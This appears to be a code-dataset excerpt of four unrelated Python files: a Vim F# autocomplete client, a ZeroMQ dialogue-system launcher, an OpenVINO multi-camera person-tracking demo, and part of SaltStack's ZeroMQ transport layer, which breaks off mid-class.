source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
fsharpvim.py
|
from subprocess import Popen, PIPE
from os import path
import string
import tempfile
import unittest
import json
import threading
class Statics:
fsac = None
locations = []
class Interaction:
def __init__(self, proc, timeOut, logfile = None):
self.data = None
self.event = threading.Event()
self.proc = proc
self._timeOut = timeOut
self.logfile = logfile
self.debug = not logfile is None
def _write(self, txt):
self.proc.stdin.write(txt)
if self.debug:
self.logfile.write("> " + txt)
self.logfile.flush()
def send(self, command):
self.data = None
self.event.clear()
self._write(command)
self.event.wait(self._timeOut)
if self.debug:
self.logfile.write('msg received %s\n' % self.data)
return self.data
# only on worker thread
def update(self, data):
self.data = data
self.event.set()
class FSAutoComplete:
def __init__(self, dir, debug = False):
if debug:
self.logfiledir = tempfile.gettempdir() + "/log.txt"
self.logfile = open(self.logfiledir, "w")
else:
self.logfile = None
command = ['mono', dir + '/bin/fsautocomplete.exe']
opts = { 'stdin': PIPE, 'stdout': PIPE, 'universal_newlines': True }
try:
self.p = Popen(command, **opts)
except WindowsError:
self.p = Popen(command[1:], **opts)
self.debug = debug
self.switch_to_json()
self.completion = Interaction(self.p, 3, self.logfile)
self._finddecl = Interaction(self.p, 1, self.logfile)
self._tooltip = Interaction(self.p, 1, self.logfile)
self._helptext = Interaction(self.p, 1, self.logfile)
self._errors = Interaction(self.p, 3, self.logfile)
self._project = Interaction(self.p, 3, self.logfile)
self.worker = threading.Thread(target=self.work, args=(self,))
self.worker.daemon = True
self.worker.start()
def __log(self, msg):
if self.debug:
self.logfile.write(msg)
def send(self, txt):
if self.debug:
self.logfile.write("> " + txt)
self.logfile.flush()
self.p.stdin.write(txt)
def work(self,_):
if self.debug:
self.logfile2 = open(tempfile.gettempdir() + "/log2.txt", "w")
while True:
data = self.p.stdout.readline()
if self.debug:
self.logfile2.write("::work read: %s" % data)
parsed = json.loads(data)
if parsed['Kind'] == "completion":
self.completion.update(parsed['Data'])
elif parsed['Kind'] == "tooltip":
self._tooltip.update(parsed['Data'])
elif parsed['Kind'] == "helptext":
self._helptext.update(parsed['Data'])
elif parsed['Kind'] == "errors":
self._errors.update(parsed['Data'])
elif parsed['Kind'] == "project":
self._project.update(parsed['Data'])
elif parsed['Kind'] == "finddecl":
self._finddecl.update(parsed['Data'])
def help(self):
self.send("help\n")
def switch_to_json(self):
self.send("outputmode json\n")
def project(self, fn):
self.send("project \"%s\"\n" % path.abspath(fn))
def parse(self, fn, full, lines):
fulltext = "full" if full else ""
self.send("parse \"%s\" %s\n" % (fn, fulltext))
for line in lines:
self.send(line + "\n")
self.send("<<EOF>>\n")
def quit(self):
self.send("quit\n")
self.p.wait()
if self.debug:
self.logfile.close()
def complete(self, fn, line, column, base):
self.__log('complete: base = %s\n' % base)
msg = self.completion.send('completion "%s" %d %d\n' % (fn, line, column))
self.__log('msg received %s\n' % msg)
msg = map(str, msg)
if base != '':
msg = filter(lambda(line):
line.lower().find(base.lower()) != -1, msg)
msg.sort(key=lambda x: x.startswith(base), reverse=True)
msg = map(lambda(line):
{'word': line,
'info': self.helptext(line),
'menu': ""}, msg)
return msg
def finddecl(self, fn, line, column):
msg = self._finddecl.send('finddecl "%s" %d %d\n' % (fn, line, column))
if msg != None:
return str(msg['File']), (int(str(msg['Line'])), int(str(msg['Column'])))
else:
return None
def errors(self, fn, full, lines):
self.__log('errors: fn = %s\n' % fn)
fulltext = "full" if full else ""
self.send("parse \"%s\" %s\n" % (fn, fulltext))
for line in lines:
self.send(line + "\n")
msg = self._errors.send("<<EOF>>\n")
return msg
def tooltip(self, fn, line, column):
msg = self._tooltip.send('tooltip "%s" %d %d 500\n' % (fn, line, column))
if msg != None:
return str(msg)
else:
return ""
def helptext(self, candidate):
msg = self._helptext.send('helptext %s\n' % candidate)
return str(msg[candidate])
class FSharpVimFixture(unittest.TestCase):
def setUp(self):
self.fsac = FSAutoComplete('.')
self.testscript = 'test/TestScript.fsx'
with open(self.testscript, 'r') as content_file:
content = map(lambda(line): line.strip('\n'), list(content_file))
self.fsac.parse(self.testscript, True, content)
def tearDown(self):
self.fsac.quit()
def test_completion(self):
completions = self.fsac.complete(self.testscript, 8, 16, '')
if __name__ == '__main__':
unittest.main()
|
run_simple_dialogue_system.py
|
from time import sleep, time
import zmq
import multiprocessing as mp
from speech_to_text import speech_to_text_main
from dialogue_control import control_main
from text_to_speech import text_to_speech_main
def start_pubsub_proxy(port_config):
""" This is the pubsub proxy. We start it in another process as it blocks until we kill it"""
# create the zmq proxy. This must be started in it's own thread or process or it will block
context_proxy = zmq.Context()
# socket that others publish to
publish_to_socket = context_proxy.socket(zmq.XSUB)
publish_to_socket.bind("tcp://*:{}".format(port_config["pub_to_proxy_port"]))
# socket that others subscribe to
subscribe_to_socket = context_proxy.socket(zmq.XPUB)
subscribe_to_socket.bind("tcp://*:{}".format(port_config["sub_to_proxy_port"]))
# now start the proxy
zmq.proxy(publish_to_socket, subscribe_to_socket)
def start_all_processes(process_funcs, port_config):
""" Starts up processes"""
# empty list for storing processes
process_list = []
# start processes
for pf in process_funcs:
# start speech to text process
new_process = mp.Process(target=pf, kwargs={"port_config": port_config})
new_process.start()
process_list.append(new_process)
return process_list
def stop_all_processes(process_list):
"""Terminates all processes"""
for p in process_list:
print("terminating process", p)
p.terminate()
def run_main(port_config=None):
""" This is responsible for starting up the system and shutting it down, either due to keyboard interrupt or the
system itself shutting down"""
t_sleep = 0.1
# set default ports
if port_config is None:
port_config = {"system_sync_port": 5553, # report for system to check that modules are sync'ed properly
"pub_to_proxy_port": 5554, # port to publish to proxy so in the proxy it is xsub
"sub_to_proxy_port": 5555, # port to subscribe to the proxy so in the proxy it is xpub
"stt_req_rep_port": 5556, # REQ-REP control port for the stt pub sub
"tts_req_rep_port": 5557, # REQ-REP port for the text to speech
}
# ------------------------------------------------------------------------------------------------------------------
# Start the pub sub proxy. Do this first to make sure it's there.
mp.set_start_method("spawn") # set this to make sure code works cross platform
proxy_process = mp.Process(target=start_pubsub_proxy, kwargs={"port_config": port_config})
proxy_process.start()
sleep(t_sleep)
print("proxy created")
# ------------------------------------------------------------------------------------------------------------------
# make the context for the main process and connect to the pubsub proxy
context = zmq.Context()
sockets_list = []
socket_system_sync = context.socket(zmq.REP)
socket_system_sync.bind("tcp://*:{}".format(port_config["system_sync_port"]))
sockets_list.append(socket_system_sync)
# make publish to proxy socket
socket_publisher = context.socket(zmq.PUB)
socket_publisher.connect("tcp://localhost:{}".format(port_config["pub_to_proxy_port"]))
sockets_list.append(socket_publisher)
# make subscribe to proxy socket
socket_subscriber = context.socket(zmq.SUB)
socket_subscriber.connect("tcp://localhost:{}".format(port_config["sub_to_proxy_port"]))
socket_subscriber.setsockopt(zmq.SUBSCRIBE, b"CONTROL")
sockets_list.append(socket_subscriber)
# make poller because we are listening to both the subscriber and the stt_reply sockets
poller = zmq.Poller()
poller.register(socket_subscriber, zmq.POLLIN)
sleep(t_sleep)
# ------------------------------------------------------------------------------------------------------------------
# start up the processes
process_funcs = [control_main,
text_to_speech_main,
speech_to_text_main]
process_list = start_all_processes(process_funcs, port_config)
# wait to be told that all processes have connected their sockets and are ready to go.
connected_modules = 0
while connected_modules < len(process_funcs):
# wait for sync request
msg = socket_system_sync.recv()
socket_system_sync.send(b"")
connected_modules += 1
print("The {} process has connected all sockets and has initialized all functionality.".format(msg.decode()))
# append the proxy to the list of processes so we can shut the proxy process down later
process_list.append(proxy_process)
sleep(0.1)
# ------------------------------------------------------------------------------------------------------------------
# Publish start message
socket_publisher.send_multipart([b"SYSTEM", b"START"])
# Now just hold until we
try:
while True:
socks = dict(poller.poll(100)) # poll for .1 ms don't block
if socket_subscriber in socks and socks[socket_subscriber] == zmq.POLLIN:
topic, message = socket_subscriber.recv_multipart()
if topic == b"CONTROL" and message == b"SHUTDOWN":
break
sleep(t_sleep)
except KeyboardInterrupt:
print("Interrupt received, stopping ...")
# TODO figure out if it can be shut down cleanly with keyboard interrupt or if I need to do something different
finally:
print("Cleaning up ...")
stop_all_processes(process_list)
print("All processes stopped.")
# Close sockets and context
for sock in sockets_list:
sock.setsockopt(zmq.LINGER, 0)
sock.close()
context.term()
print("Main process shutdown.")
if __name__ == "__main__":
run_main()
|
multi_camera_multi_target_tracking.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import datetime
import json
import logging as log
import os
import queue
import random
import subprocess
import sys
import time
from collections import defaultdict
from os.path import splitext
from pathlib import Path
from threading import Lock, Thread
import cv2 as cv
from openvino.inference_engine import \
IECore # pylint: disable=import-error,E0611
from .mc_tracker.mct import MultiCameraTracker
from .utils.analyzer import save_embeddings
from .utils.classify_persons import classify_persons_per_frame
from .utils.misc import (AverageEstimator, check_pressed_keys, read_py_config,
set_log_config)
from .utils.network_wrappers import (DetectionsFromFileReader, Detector,
MaskRCNN, VectorCNN)
from .utils.network_wrappers_yolo import YOLOV4, YOLOV4Tiny
from .utils.video import MulticamCapture, NormalizerCLAHE
from .utils.visualization import get_target_size, visualize_multicam_detections
sys.path.append(os.path.join(os.path.dirname(
os.path.dirname(os.path.abspath(__file__))), 'common'))
# Please import monitors here.
import monitors
set_log_config()
OUTPUT_VIDEO_SIZE_LIMIT = 1000 * 1024 * 1024 # 1GB
MAX_GET_FRAME_TIMES = 50
threading_lock = Lock()
def check_detectors(args):
detectors = {
'--m_detector': args.m_detector,
'--m_segmentation': args.m_segmentation,
'--detections': args.detections
}
non_empty_detectors = [(det, value)
for det, value in detectors.items() if value]
det_number = len(non_empty_detectors)
if det_number == 0:
log.error('No detector specified, please specify one of the following parameters: '
'\'--m_detector\', \'--m_segmentation\' or \'--detections\'')
elif det_number > 1:
det_string = ''.join('\n\t{}={}'.format(
det[0], det[1]) for det in non_empty_detectors)
log.error('Only one detector expected but got {}, please specify one of them:{}'
.format(len(non_empty_detectors), det_string))
return det_number
def update_detections(output, detections, frame_number):
for i, detection in enumerate(detections):
entry = {'frame_id': frame_number, 'scores': [], 'boxes': []}
for det in detection:
entry['boxes'].append(det[0])
entry['scores'].append(float(det[1]))
output[i].append(entry)
def save_json_file(save_path, data, description=''):
save_dir = os.path.dirname(save_path)
if save_dir and not os.path.exists(save_dir):
os.makedirs(save_dir)
with open(save_path, 'w') as outfile:
json.dump(data, outfile)
if description:
log.info('{} saved to {}'.format(description, save_path))
class FramesThreadBody:
def __init__(self, capture, max_queue_length=2):
self.process = True
self.frames_queue = queue.Queue()
self.seconds_queue = queue.Queue()
self.capture = capture
self.max_queue_length = max_queue_length
self.retry_times = 0
def __call__(self):
while self.process:
if self.frames_queue.qsize() > self.max_queue_length:
time.sleep(0.1)
continue
has_frames, frames, seconds = self.capture.get_frames()
if not has_frames and self.frames_queue.empty():
self.retry_times +=1
if self.retry_times >= MAX_GET_FRAME_TIMES:
self.process = False
log.warn(f'No frames for {self.retry_times} times, exit.')
break
if has_frames:
self.retry_times = 0
self.frames_queue.put(frames)
self.seconds_queue.put(seconds)
def run(params, config, capture, detector, reid, classify_person_flow=None):
win_name = 'Multi camera tracking'
frame_number = 0
avg_latency = AverageEstimator()
output_detections = [[] for _ in range(capture.get_num_sources())]
key = -1
if config['normalizer_config']['enabled']:
capture.add_transform(
NormalizerCLAHE(
config['normalizer_config']['clip_limit'],
config['normalizer_config']['tile_size'],
)
)
tracker = MultiCameraTracker(capture.get_num_sources(), reid, config['sct_config'], **config['mct_config'],
visual_analyze=config['analyzer'])
thread_body = FramesThreadBody(
capture, max_queue_length=len(capture.captures) * 2)
frames_thread = Thread(target=thread_body)
frames_thread.start()
rtsp_mode = params.output_video.startswith('rtsp://')
if len(params.output_video):
frame_size, source_fps = capture.get_source_parameters()
if params.fps:
source_fps = [params.fps]
target_width, target_height = get_target_size(
frame_size, None, **config['visualization_config'])
video_output_size = (target_width, target_height)
fourcc = cv.VideoWriter_fourcc(*'XVID')
if rtsp_mode:
# https://gist.github.com/takidog/2c981c34d5d5b41c0d712f8ef4ac60d3
# E.g. rtsp://localhost:8554/output
# Use "-c copy" would increase video quality but slowdown process
command = ['ffmpeg',
'-i', '-',
'-f', 'rtsp',
params.output_video]
output_video = subprocess.Popen(command, stdin=subprocess.PIPE)
else:
output_video = cv.VideoWriter(
params.output_video, fourcc, min(source_fps), video_output_size)
else:
output_video = None
prev_frames = thread_body.frames_queue.get()
detector.run_async(prev_frames, frame_number)
presenter = monitors.Presenter(params.utilization_monitors, 0)
start_time = datetime.datetime.now()
action_to_person_ids = defaultdict(set)
while thread_body.process:
try:
tick = datetime.datetime.now()
if not params.no_show:
key = check_pressed_keys(key)
if key == 27:
break
presenter.handleKey(key)
start = time.perf_counter()
try:
frames = thread_body.frames_queue.get_nowait()
seconds = thread_body.seconds_queue.get_nowait()
except queue.Empty:
frames = None
seconds = None
if frames is None:
continue
all_detections = detector.wait_and_grab()
if params.save_detections:
update_detections(output_detections, all_detections, frame_number)
frame_number += 1
frame_times = [start_time + datetime.timedelta(0, s) for s in seconds]
detector.run_async(frames, frame_number)
all_masks = [[] for _ in range(len(all_detections))]
for i, detections in enumerate(all_detections):
all_detections[i] = [det[0] for det in detections]
all_masks[i] = [det[2] for det in detections if len(det) == 3]
tracker.process(prev_frames, all_detections, all_masks)
tracked_objects = tracker.get_tracked_objects()
latency = max(time.perf_counter() - start, sys.float_info.epsilon)
avg_latency.update(latency)
fps = round(1. / latency, 1)
person_class_dict = {}
if classify_person_flow:
# Crop persons to classify before drawing
person_class_dict = classify_persons_per_frame(
frame_times, prev_frames, tracked_objects, classify_person_flow, **config['visualization_config'])
for person_id, (person_class, detect_lines, person_action) in person_class_dict.items():
if person_action:
action_to_person_ids[person_action].add(person_id)
vis = visualize_multicam_detections(
frame_times, prev_frames, tracked_objects, action_to_person_ids, person_class_dict, fps, **config['visualization_config'])
presenter.drawGraphs(vis)
if not params.no_show:
cv.imshow(win_name, vis)
if output_video:
if rtsp_mode:
ret, frame = cv.imencode('.jpg', vis)
if ret:
output_video.stdin.write(frame.tobytes())
else:
output_video.write(cv.resize(vis, video_output_size))
output_video_file = Path(params.output_video)
if output_video_file.stat().st_size > OUTPUT_VIDEO_SIZE_LIMIT:
output_video_file.unlink()
output_video = cv.VideoWriter(
params.output_video, fourcc, min(source_fps), video_output_size)
if params.output_image:
# https://blog.gtwang.org/programming/python-threading-multithreaded-programming-tutorial/
Thread(target = write_output_image, args = (params.output_image, vis,)).start()
# print('\rProcessing frame: {}, fps = {} (avg_fps = {:.3})'.format(
# frame_number, fps, 1. / avg_latency.get()), end="")
prev_frames, frames = frames, prev_frames
tock = datetime.datetime.now()
diff = tock - tick
# https://stackoverflow.com/questions/5419389/how-to-overwrite-the-previous-print-to-stdout-in-python
print(frame_times, f'takes {diff.total_seconds()}s', end='\r')
except Exception as e:
thread_body.process = False
raise e
print(presenter.reportMeans())
print('')
thread_body.process = False
frames_thread.join()
if len(params.history_file):
save_json_file(params.history_file, tracker.get_all_tracks_history(
), description='History file')
if len(params.save_detections):
save_json_file(params.save_detections,
output_detections, description='Detections')
if len(config['embeddings']['save_path']):
save_embeddings(tracker.scts, **config['embeddings'])
def write_output_image(output_image, vis):
file_path, ext = splitext(output_image)
tmp_file_name = f'{file_path}.tmp{ext}'
threading_lock.acquire()
cv.imwrite(tmp_file_name, vis, [int(cv.IMWRITE_JPEG_QUALITY), 80])
os.rename(tmp_file_name, output_image)
threading_lock.release()
def main(classify_person_flow=None, inputs=None, output_video=None, output_image=None):
current_dir = os.path.dirname(os.path.abspath(__file__))
"""Prepares data for the object tracking demo"""
parser = argparse.ArgumentParser(fromfile_prefix_chars='@', description='Multi camera multi object \
tracking live demo script')
parser.add_argument('-i', type=str, nargs='+', help='Input sources (indexes \
of cameras or paths to video files)', default=inputs, required=False)
parser.add_argument('--config', type=str, default=os.path.join(current_dir, 'configs/person.py'), required=False,
help='Configuration file')
parser.add_argument('--detections', type=str,
help='JSON file with bounding boxes')
parser.add_argument('-m', '--m_detector', type=str, required=False,
help='Path to the object detection model')
parser.add_argument('--t_detector', type=float, default=0.6,
help='Threshold for the object detection model')
parser.add_argument('--m_segmentation', type=str, required=False,
help='Path to the object instance segmentation model')
parser.add_argument('--t_segmentation', type=float, default=0.6,
help='Threshold for object instance segmentation model')
parser.add_argument('--m_reid', type=str, required=False,
help='Path to the object re-identification model')
parser.add_argument('--output_video', type=str, default=output_video, required=False,
help='Optional. Path to output video')
parser.add_argument('--output_image', type=str, default=output_image, required=False,
help='Optional. Path to output image')
parser.add_argument('--history_file', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save results of the demo')
parser.add_argument('--save_detections', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save bounding boxes')
parser.add_argument(
"--no_show", help="Optional. Don't show output", action='store_true')
parser.add_argument('-d', '--device', type=str, default='CPU')
parser.add_argument('-l', '--cpu_extension',
help='MKLDNN (CPU)-targeted custom layers.Absolute \
path to a shared library with the kernels impl.',
type=str, default=None)
parser.add_argument('-u', '--utilization_monitors', default='', type=str,
help='Optional. List of monitors to show initially.')
parser.add_argument('--fps', type=float, required=True)
parser.add_argument("--seek_mode", help="", action='store_true')
args, _ = parser.parse_known_args()
if check_detectors(args) != 1:
sys.exit(1)
if len(args.config):
log.info('Reading configuration file {}'.format(args.config))
config = read_py_config(args.config)
else:
log.error(
'No configuration file specified. Please specify parameter \'--config\'')
sys.exit(1)
random.seed(config['random_seed'])
capture = MulticamCapture(args.i, args.seek_mode, args.fps)
log.info("Creating Inference Engine")
ie = IECore()
if args.detections:
object_detector = DetectionsFromFileReader(
args.detections, args.t_detector)
elif args.m_segmentation:
object_detector = MaskRCNN(ie, args.m_segmentation,
config['obj_segm']['trg_classes'],
args.t_segmentation,
args.device, args.cpu_extension,
capture.get_num_sources())
else:
if 'yolov4' in args.m_detector:
# Person class index is 0
trg_classes = [0]
if 'tiny' in args.m_detector:
out_blob = 'ALL'
object_detector = YOLOV4Tiny(ie, args.m_detector,
trg_classes,
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources(), out_blob=out_blob)
else:
out_blob='output'
object_detector = YOLOV4(ie, args.m_detector,
trg_classes,
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources(), out_blob=out_blob)
else:
object_detector = Detector(ie, args.m_detector,
config['obj_det']['trg_classes'],
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources())
if args.m_reid:
object_recognizer = VectorCNN(
ie, args.m_reid, args.device, args.cpu_extension)
else:
object_recognizer = None
run(args, config, capture, object_detector,
object_recognizer, classify_person_flow)
log.info('Finished successfully')
if __name__ == '__main__':
main()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import socket
import hashlib
import logging
import weakref
import threading
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.log.setup
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.utils.versions
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltException
from salt._compat import ipaddress
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import salt.ext.tornado
import salt.ext.tornado.ioloop
import salt.ext.tornado.gen
import salt.ext.tornado.concurrent
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip,
master_port,
source_ip=None,
source_port=None):
'''
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
'''
from salt.utils.zeromq import ip_bracket
master_uri = 'tcp://{master_ip}:{master_port}'.format(
master_ip=ip_bracket(master_ip), master_port=master_port)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip), source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_ip and not source_port:
master_uri = 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_port and not source_ip:
ip_any = '0.0.0.0' if ipaddress.ip_address(master_ip).version == 4 else ip_bracket('::')
master_uri = 'tcp://{ip_any}:{source_port};{master_ip}:{master_port}'.format(
ip_any=ip_any, source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
else:
log.warning('Unable to connect to the Master using a specific source IP / port')
log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
log.warning('Specific source IP / port for connecting to master returner port: configuraion ignored')
return master_uri
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
id(loop_instance_map), key, os.getpid())
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop', '_refcount', '_refcount_lock'):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.master_uri)
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop})
self._closing = False
def close(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if 'master_uri' in self.opts:
return self.opts['master_uri']
# if by chance master_uri is not there..
if 'master_ip' in self.opts:
return _get_master_uri(self.opts['master_ip'],
self.opts['master_port'],
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_ret_port'))
# if we've reached here something is very abnormal
raise SaltException('ReqChannel: missing master_uri/master_ip in self.opts')
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret['key'],
RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
